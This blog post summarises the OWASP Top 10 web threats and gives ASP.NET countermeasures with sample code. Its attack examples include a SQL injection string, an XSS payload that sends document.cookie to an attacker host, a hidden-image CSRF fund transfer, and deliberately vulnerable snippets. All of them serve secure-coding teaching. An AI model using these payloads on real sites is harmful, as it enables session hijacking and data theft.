Just another tech site

Web Application Security


OWASP gives an interesting perspective on the main threats.
This is a summary of the OWASP site; please refer to it for the complete details and the original post.

OWASP Top 10 threats

A1: Injection
A2: Cross-Site Scripting (XSS)
A3: Broken Authentication and Session Management
A4: Insecure Direct Object References
A5: Cross-Site Request Forgery (CSRF)
A6: Security Misconfiguration
A7: Insecure Cryptographic Storage
A8: Failure to Restrict URL Access
A9: Insufficient Transport Layer Protection
A10: Unvalidated Redirects and Forwards

Threat                                           Attack Vectors  Security Weakness              Technical Impacts
                                                 Exploitability  Prevalence      Detectability  Impact
A1: Injection                                    EASY            COMMON          AVERAGE        SEVERE
A2: Cross-Site Scripting (XSS)                   AVERAGE         VERY WIDESPREAD EASY           MODERATE
A3: Broken Authentication and Session Management AVERAGE         COMMON          AVERAGE        SEVERE
A4: Insecure Direct Object References            EASY            COMMON          EASY           MODERATE
A5: Cross-Site Request Forgery (CSRF)            AVERAGE         WIDESPREAD      EASY           MODERATE
A6: Security Misconfiguration                    EASY            COMMON          EASY           MODERATE
A7: Insecure Cryptographic Storage               EASY            COMMON          DIFFICULT      SEVERE
A8: Failure to Restrict URL Access               EASY            UNCOMMON        AVERAGE        MODERATE
A9: Insufficient Transport Layer Protection      DIFFICULT       COMMON          EASY           MODERATE
A10: Unvalidated Redirects and Forwards          EASY            UNCOMMON        EASY           MODERATE

A1: Injection

Example

The application uses untrusted data in the construction of the following vulnerable SQL call:

String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") +"'";

The attacker modifies the 'id' parameter in their browser to send: ' or '1'='1. This changes the meaning of the query to return all the records from the accounts database, instead of only the intended customer's.

http://example.com/app/accountView?id=' or '1'='1

In the worst case, the attacker uses this weakness to invoke special stored procedures in the database, allowing a complete takeover of the database host.

How to Prevent the attack

1.- Use validation:
Positive or "whitelist" input validation with appropriate canonicalization.

2.- Use a safe API:
Use parameterized queries such as SqlCommand() or OleDbCommand() with bind variables. Entity Framework also prevents this type of attack because its queries are parameterized.
– Avoid LINQ ExecuteQuery
– Avoid EXEC in stored procedures
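Added example (not code from the original post or from OWASP): the concatenated query above placed beside its parameterized SqlCommand equivalent, with whitelist validation of the id first. The connection string and the accounts table layout are assumed.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;
using System.Web;

public static class AccountQueries
{
    // VULNERABLE: the request value is pasted into the SQL text, so
    // id=' or '1'='1 rewrites the WHERE clause and returns every account.
    public static string BuildUnsafeQuery(HttpRequest request)
    {
        return "SELECT * FROM accounts WHERE custID='" + request.QueryString["id"] + "'";
    }

    // SAFE: the SQL text is fixed at compile time; the value travels as a
    // typed bind variable (@custId) and is never parsed as SQL, whatever
    // characters it contains.
    public static DataTable GetAccount(string connectionString, string rawId)
    {
        // Positive (whitelist) validation: a customer id must be an integer.
        if (!int.TryParse(rawId, out int custId))
            throw new ArgumentException("id must be an integer");

        const string sql = "SELECT * FROM accounts WHERE custID = @custId";
        var table = new DataTable();
        using (var conn = new SqlConnection(connectionString))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@custId", SqlDbType.Int).Value = custId;
            conn.Open();
            using (var reader = cmd.ExecuteReader())
                table.Load(reader);
        }
        return table;
    }
}
```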

A2: Cross-Site Scripting (XSS)

Cross-site scripting (XSS) attacks exploit vulnerabilities in Web page validation by injecting client-side script code.

Example Scenarios

The application uses untrusted data in the construction of the following HTML snippet without validation or escaping:

(String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";

The attacker modifies the ‘CC’ parameter in their browser to:

'><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'.

This causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session.

How to Prevent the attack in ASP.NET

Microsoft's best practices for preventing these attacks are described in [3].
Step 1. Check that ASP.NET request validation is enabled.

<system.web>
  <pages buffer="true" validateRequest="true" />
</system.web>

Step 2. Review ASP.NET code that generates HTML output.

Look for these output patterns:
Response.Write
<%= %>

Step 3. Determine whether HTML output includes input parameters.

Step 4. Review potentially dangerous HTML tags and attributes.
Step 5. Evaluate countermeasures.

Test

Submit the following through an input field:

<script>alert('hello');</script> 
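Added example (not from the original post or from Microsoft's guidance): the creditcard snippet above in its unencoded form beside an output-encoded form, plus a helper for step 3 of the checklist. The attribute is rendered with double quotes so that HtmlAttributeEncode, which encodes &, < and the double quote, always neutralises a break-out attempt.

```csharp
using System.Web;

public static class CreditCardField
{
    // VULNERABLE: mirrors the original snippet. The CC value is spliced
    // into an attribute, so a value starting with '> closes the attribute
    // and the tag and whatever follows is parsed as markup.
    public static string RenderUnencoded(string cc)
    {
        return "<input name='creditcard' type='TEXT' value='" + cc + "'>";
    }

    // SAFE: encode for the exact context (a double-quoted attribute value).
    // The delimiting quote becomes &quot;, < becomes &lt;, so the browser
    // treats the whole value as text and never as a new tag or script.
    public static string RenderEncoded(string cc)
    {
        return "<input name=\"creditcard\" type=\"text\" value=\""
             + HttpUtility.HtmlAttributeEncode(cc) + "\">";
    }

    // Step 3 of the checklist: flag a response that still carries a raw
    // request value containing markup characters.
    public static bool OutputReflectsRawInput(string responseBody, string rawInput)
    {
        return rawInput.IndexOfAny(new[] { '<', '>', '"', '\'' }) >= 0
            && responseBody.Contains(rawInput);
    }
}
```

Body text (between tags) needs HttpUtility.HtmlEncode instead; each output context has its own encoder.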

A3: Broken Authentication and Session Management

Example

Application supports URL rewriting, putting session IDs in the URL:

http://example.com/sale/saleitems;jsessionid=2P0OC2JDPXM0OQSNDLPSKHCJUN2JV?dest=Hawaii

HttpOnly

If the HttpOnly flag (optional) is included in the HTTP response header, the cookie cannot be accessed through client-side script (again, if the browser supports this flag) [5].
In .NET 2.0, HttpOnly can also be set for all custom application cookies via the HttpCookie object, or via web.config in the system.web/httpCookies element:

<httpCookies httpOnlyCookies="true" …> 

Or programmatically

C# code:
HttpCookie myCookie = new HttpCookie("myCookie");
myCookie.HttpOnly = true;
Response.AppendCookie(myCookie);

Resulting Set-Cookie header syntax:
Set-Cookie: <name>=<value>[; <Max-Age>=<age>]
[; expires=<date>][; domain=<domain_name>]
[; path=<some_path>][; secure][; HttpOnly]

ASP.NET SessionID

The session cookie contains the SessionID used to identify the user session. If you want to secure your session, use HTTPS to encrypt the whole HTTP communication via SSL and set the cookies only with the flags
– secure, to only allow the cookie to be sent via HTTPS, and
– HttpOnly, to forbid local access via JavaScript.

A4: Insecure Direct Object References

The scenario involves the use of a data reference (or extrapolating a new id from it) in order to access restricted data.

Example:

http://example.com/productDetail.aspx?id=112

The application uses unverified data in a SQL call that accesses account information. In this case the application will make a query:

// 1. Create a command object identifying the stored procedure
SqlCommand cmd = new SqlCommand("Ten Most Expensive Products", conn);

// 2. Tell the command object to execute a stored procedure
cmd.CommandType = CommandType.StoredProcedure;

// 3. Add the parameter passed to the stored procedure. productId is taken
//    straight from the "id" query-string value and is never checked
//    against the current user.
cmd.Parameters.Add(new SqlParameter("@ProductID", productId));

// 4. Execute the command
SqlDataReader rdr = cmd.ExecuteReader();

So if the user changes the request in the browser, they can request any other product id.

Prevention:

Lines of defence:
a.- Avoid presenting "guessable IDs", for example sequential ids (typically the DB id) used as object references. This makes guessing the next reference much harder.
b.- Secure the data layer: authenticate each access to the data layer.
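Added example (not from the original post): an indirect reference map for line of defence a. The server hands out random per-user tokens instead of database ids, and resolves a token only if this user was given it; the assumption is that one map is kept per authenticated session (e.g. in Session state), and the owner check of line b still runs in the data layer.

```csharp
using System;
using System.Collections.Generic;
using System.Security.Cryptography;

public sealed class ReferenceMap
{
    private readonly Dictionary<string, int> _tokenToId = new Dictionary<string, int>();
    private readonly Dictionary<int, string> _idToToken = new Dictionary<int, string>();

    // Called while rendering the list of objects this user is allowed to see:
    // productDetail.aspx?ref=<token> is emitted instead of ?id=112.
    public string TokenFor(int objectId)
    {
        if (_idToToken.TryGetValue(objectId, out string existing))
            return existing;                       // stable within the session

        var bytes = new byte[16];                  // 128 random bits: not guessable
        using (var rng = RandomNumberGenerator.Create())
            rng.GetBytes(bytes);
        string token = Convert.ToBase64String(bytes)
            .TrimEnd('=').Replace('+', '-').Replace('/', '_');   // URL-safe form

        _idToToken[objectId] = token;
        _tokenToId[token] = objectId;
        return token;
    }

    // Called when a request arrives. An id the user was never shown (112 -> 113
    // by editing the URL) has no token in this map and is refused.
    public bool TryResolve(string token, out int objectId)
    {
        return _tokenToId.TryGetValue(token ?? string.Empty, out objectId);
    }
}
```

A resolved id should still be passed to a data-layer query that filters by the current user, so that a bug in session handling does not become a data leak.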

A5: Cross-Site Request Forgery (CSRF)

Example:
The application allows a user to submit a state changing request that does not include anything secret. Like so:

http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243

So, the attacker constructs a request that will transfer money from the victim’s account to their account, and then embeds this attack in an image request or iframe stored on various sites under the attacker’s control.

<img src="http://example.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct#" width="0" height="0" />

If the victim visits any of these sites while already authenticated to example.com, any forged requests will include the user’s session info, inadvertently authorizing the request.

HOW TO PREVENT THE ATTACK
Preventing CSRF requires the inclusion of an unpredictable token in the body or URL of each HTTP request. Such tokens should at a minimum be unique per user session, but can also be unique per request.

Use ViewStateUserKey or ValidateAntiForgeryTokenAttribute to add a layer of defense against Cross-Site Request Forgery (XSRF) attacks. All ASP.NET Web Forms that require authentication must set the System.Web.UI.Page.ViewStateUserKey property to a unique value per user (such as the user's session ID) to help protect the application against cross-site request forgery attacks. [8]
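Added example (not from the original post or from the MSDN article): where the two mechanisms named above go in Web Forms and in ASP.NET MVC, and why the transfer is only accepted on POST. The IFundsService interface is an assumed application service.

```csharp
using System;
using System.Web.Mvc;
using System.Web.UI;

// Web Forms: bind the ViewState MAC to this user's session. A ViewState
// blob captured or prepared under another session no longer validates.
public partial class TransferFundsPage : Page
{
    protected void Page_Init(object sender, EventArgs e)
    {
        ViewStateUserKey = Session.SessionID;
    }
}

// ASP.NET MVC: the view renders @Html.AntiForgeryToken(), which emits a
// hidden field plus a cookie; ValidateAntiForgeryToken rejects the POST
// unless both are present and match. A third-party page can trigger the
// request but cannot read the cookie, so it cannot supply the field.
public class AccountController : Controller
{
    private readonly IFundsService funds;      // assumed service, not part of the page
    public AccountController(IFundsService funds) { this.funds = funds; }

    // No GET action performs the transfer: the <img src=...> request above
    // is a GET and is not routed to this method.
    [HttpPost]
    [ValidateAntiForgeryToken]
    public ActionResult TransferFunds(decimal amount, string destinationAccount)
    {
        // The source account is always the authenticated user, never a parameter.
        funds.Transfer(User.Identity.Name, amount, destinationAccount);
        return RedirectToAction("Index");
    }
}

public interface IFundsService
{
    void Transfer(string fromUser, decimal amount, string destinationAccount);
}
```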

A6: Security Misconfiguration

The list can be very long. Basically, administrator inattention can lead to omissions that will be used by attackers, for example:
– The app server admin console is automatically installed and not removed.
– Directory listing is not disabled on your server.
– App server configuration allows stack traces

HOW TO PREVENT THE ATTACK
The principal idea is to minimise the attack surface by leaving the minimum of elements on the server. This process is called server hardening. During this process, the administrator reviews all server settings and makes sure that a minimum set of features is installed and the most restrictive permissions are applied.

Here is a list of some elements you should look at:

1. Change the default admin password.
2. Verify that ASP.NET errors are not returned to the client.
3. Make sure that the mode attribute is set to "RemoteOnly" in the web.config file.
4. IIS configuration: directory listing disabled.
5. web.config file encrypted.
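Added example (not from the original post): a web.config fragment that covers items 2 to 4 of the list above. The error page path is assumed.

```xml
<configuration>
  <system.web>
    <!-- Items 2 and 3: detailed errors and stack traces are shown only when
         browsing from the server itself; remote clients get the generic page. -->
    <customErrors mode="RemoteOnly" defaultRedirect="~/Error.aspx" />
    <!-- Debug builds emit extra diagnostics; never deploy with debug="true". -->
    <compilation debug="false" />
  </system.web>
  <system.webServer>
    <!-- Item 4 (IIS 7 and later): no directory browsing. -->
    <directoryBrowse enabled="false" />
  </system.webServer>
</configuration>
```

Item 5 is done outside the file: the aspnet_regiis tool with its -pe option encrypts a named section such as connectionStrings in place.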

A7: Insecure Cryptographic Storage

The typical cases are information stored in an unencrypted manner, or an encrypted file stored in the same directory as the key used to encrypt/decrypt it.

HOW TO PREVENT THE ATTACK
1. Ensure all data storages are encrypted.
2. Ensure offsite backups are encrypted (the keys are managed and backed up separately).
3. Ensure appropriate strong standard algorithms and strong keys are used.
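Added example (not from the original post): AES-256 in CBC mode with a fresh random IV per record, where the key is supplied by the caller rather than read from a file beside the ciphertext. It assumes the key comes from a separate store such as a key-management service or DPAPI-protected configuration.

```csharp
using System;
using System.Security.Cryptography;
using System.Text;

public static class RecordProtector
{
    // Output layout: [16-byte IV][ciphertext]. The IV is not secret and is
    // stored with the data; the key never is.
    public static byte[] Encrypt(byte[] key, string plaintext)
    {
        if (key == null || key.Length != 32)
            throw new ArgumentException("AES-256 requires a 32-byte key");
        using (var aes = Aes.Create())
        {
            aes.Key = key;                       // key from the external store (assumption)
            aes.Mode = CipherMode.CBC;           // PKCS7 padding is the default
            aes.GenerateIV();                    // unique per call; never reuse with this key
            byte[] iv = aes.IV;
            byte[] data = Encoding.UTF8.GetBytes(plaintext);
            using (var enc = aes.CreateEncryptor())
            {
                byte[] body = enc.TransformFinalBlock(data, 0, data.Length);
                byte[] blob = new byte[iv.Length + body.Length];
                Buffer.BlockCopy(iv, 0, blob, 0, iv.Length);
                Buffer.BlockCopy(body, 0, blob, iv.Length, body.Length);
                return blob;
            }
        }
    }

    public static string Decrypt(byte[] key, byte[] blob)
    {
        using (var aes = Aes.Create())
        {
            aes.Key = key;
            aes.Mode = CipherMode.CBC;
            byte[] iv = new byte[aes.BlockSize / 8];      // 16 bytes for AES
            if (blob == null || blob.Length < iv.Length)
                throw new ArgumentException("blob is too short to hold an IV");
            Buffer.BlockCopy(blob, 0, iv, 0, iv.Length);
            aes.IV = iv;
            using (var dec = aes.CreateDecryptor())
                return Encoding.UTF8.GetString(
                    dec.TransformFinalBlock(blob, iv.Length, blob.Length - iv.Length));
        }
    }
}
```

CBC alone gives confidentiality, not integrity; where tampering matters, add an HMAC over IV plus ciphertext under a second key and verify it before decrypting.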

A8: Failure to Restrict URL Access

Example:
Imagine the user has access to a page and then manually changes the URL to an admin page.

http://example.com/app/getappInfo
http://example.com/app/admin_getappInfo

If no authorization check is done beyond the first one, the user might have access to the second URL.

HOW TO PREVENT THE ATTACK
The ASP.NET authorization mechanism should be implemented [6].
With URL authorization, you explicitly allow or deny access to a particular directory by user name or role.

  <location path="Order">
    <system.web>
      <authorization>
        <allow roles="MasterAdministrator,Administrator,OrderManager" />
      </authorization>
    </system.web>
  </location>

AUTOCOMPLETE HTML attribute

It is recommended that the AUTOCOMPLETE attribute on all sensitive forms should be disabled using the following code example:

<FORM AUTOCOMPLETE="off">
 :
</FORM>

For further information about AutoComplete, please visit
http://msdn.microsoft.com/en-us/library/ms533032.aspx

Reference

[1] https://www.owasp.org/index.php/Top_10_2010-A1
[2] http://www.articlesbase.com/security-articles/web-20-security-testing-approach-918831.html
[3] http://msdn.microsoft.com/en-us/library/ff649310.aspx (XSS attack prevention)
[4] http://stackoverflow.com/questions/2840559/is-encrypting-session-id-or-other-authenticate-value-in-cookie-useful-at-all (sessionId)
[5] https://www.owasp.org/index.php/HttpOnly (HttpOnly)
[6] http://msdn.microsoft.com/en-us/library/wce3kxhd(v=VS.100).aspx (.NET authorization)
[7] http://msdn.microsoft.com/en-us/library/b6x6shw7.aspx (.NET authorization location element)
[8] http://msdn.microsoft.com/en-us/library/ms533032.aspx
